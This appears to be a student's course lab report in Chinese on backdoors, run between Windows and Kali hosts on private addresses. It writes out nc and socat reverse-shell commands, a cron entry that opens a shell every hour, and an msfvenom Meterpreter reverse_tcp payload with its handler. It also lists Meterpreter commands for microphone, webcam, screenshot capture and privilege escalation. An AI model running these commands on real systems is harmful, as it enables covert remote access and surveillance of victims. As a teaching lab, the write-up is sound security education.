• 20165302 程上杰 Exp2 后门原理与实践


    一,后门概念

    后门就是不经过正常认证流程而访问系统的通道。

    二,后门工具

    1.netcat(nc、ncat)

    • 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

    2.socat

    • 类似于Netcat的加强版。以上两个工具均可以在老师课件主页的附件中下载.

    3.Meterpreter

    • 利用 Metaspolit 的 msfvenom 指令生成后门可执行文件,本实验要生成的这个后门程序就是Meterpreter。

    Windows获得Linux Shell

    • windows中ipconfig查看ip

    • 进入ncat.exe程序所在的路径,ncat.exe -l -p 5302

    • 在kali中,nc 192.168.33.1 5302 -e /bin/sh

    • Windows成功获得kali的shell

    Linux获得Windows Shell

    • kali中ifconfig查看ip
    • nc -l -p 5302
    • 在windows中,ncat.exe -e cmd.exe 192.168.80.132 5302
    • 成功

    用nc传输数据

    • windows中ncat.exe -l 5302
    • kali中,nc 192.168.33.1 5302
    • 连接成功

    三,实验步骤

    • windows中监听5302端口,ncat.exe -l -p 5302

    • kali中crontab指令增加一条定时任务,"-e"表示编辑。因为是第一次编辑,故提示选择编辑器,我选择了3,并添加了最后一行

    • 56 * * * * /bin/netcat 192.168.33.1 5302 -e /bin/sh,就是在每个小时的第56分钟执行后面的那条指令

    • 到时间后可以使用ls指令

    socat 定时启动

    • 打开“计算机管理”
    • “任务计划程序”------“创建任务”
    • 操作--添加脚本(socat.exe的路径)---添加参数(tcp-listen:5302 exec:cmd.exe,pty,stderr)

    • kali中输入socat - tcp:192.168.33.1:5302

    体验 MSF Meterpreter 功能

    • 在kali上,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.132 LPORT=5302 -f exe > 20165302_backdoor.exe,此条指令意为生成一个.exe程序,将来在windows上运行时会回连到Linux主机相应端口

    • 在Windows下执行ncat.exe -l 5302 > 20165302_backdoor.exe
    • 在Linux中执行nc 192.168.33.1 5302 < 20165302_backdoor.exe
    • 在Kali上使用msfconsole指令进入msf控制台
    • 输入use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST 192.168.80.132
    • set LPORT 5302

    • exploit
    • windows运行20165302_backdoor.exe

    使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

    • record_mic进行录音

    • webcam_snap使用摄像头

    • 输入指令screenshot 截取屏幕
    • 输入指令getuid 查看当前用户,输入指令getsystem 提权

    回答问题

    1.例举你能想到的一个后门进入到你系统中的可能方式?

    用户在下载软件时,软件绑定了后门

    2.例举你知道的后门如何启动起来(win及linux)的方式?

    win中的后门可能伴随可执行文件一同启动
    Linux通过cron启动
    3.Meterpreter有哪些给你映像深刻的功能?

    窃取摄像机,录像,录音
    记录键盘击键顺序

    4.如何发现自己有系统有没有被安装后门?

    通过杀毒软件进行监控

  • 相关阅读:
    Vue基础知识总结(一)
    D3.js系列——布局:弦图和集群图/树状图
    D3.js系列——布局:饼状图和力导向图
    D3.js系列——交互式操作和布局
    SQLServer调试
    SQL Server性能常用语句
    sqlserver索引
    从 datetime2 数据类型到 datetime 数据类型的转换产生一个超出范围的值
    EntityFrame6在本地可以正常使用,部署到IIS后报异常(Additional information: The underlying provider failed on Open.)
    从对象创建和引用小议解耦
  • 原文地址:https://www.cnblogs.com/dky20165302/p/10563178.html
Copyright © 2020-2023  润新知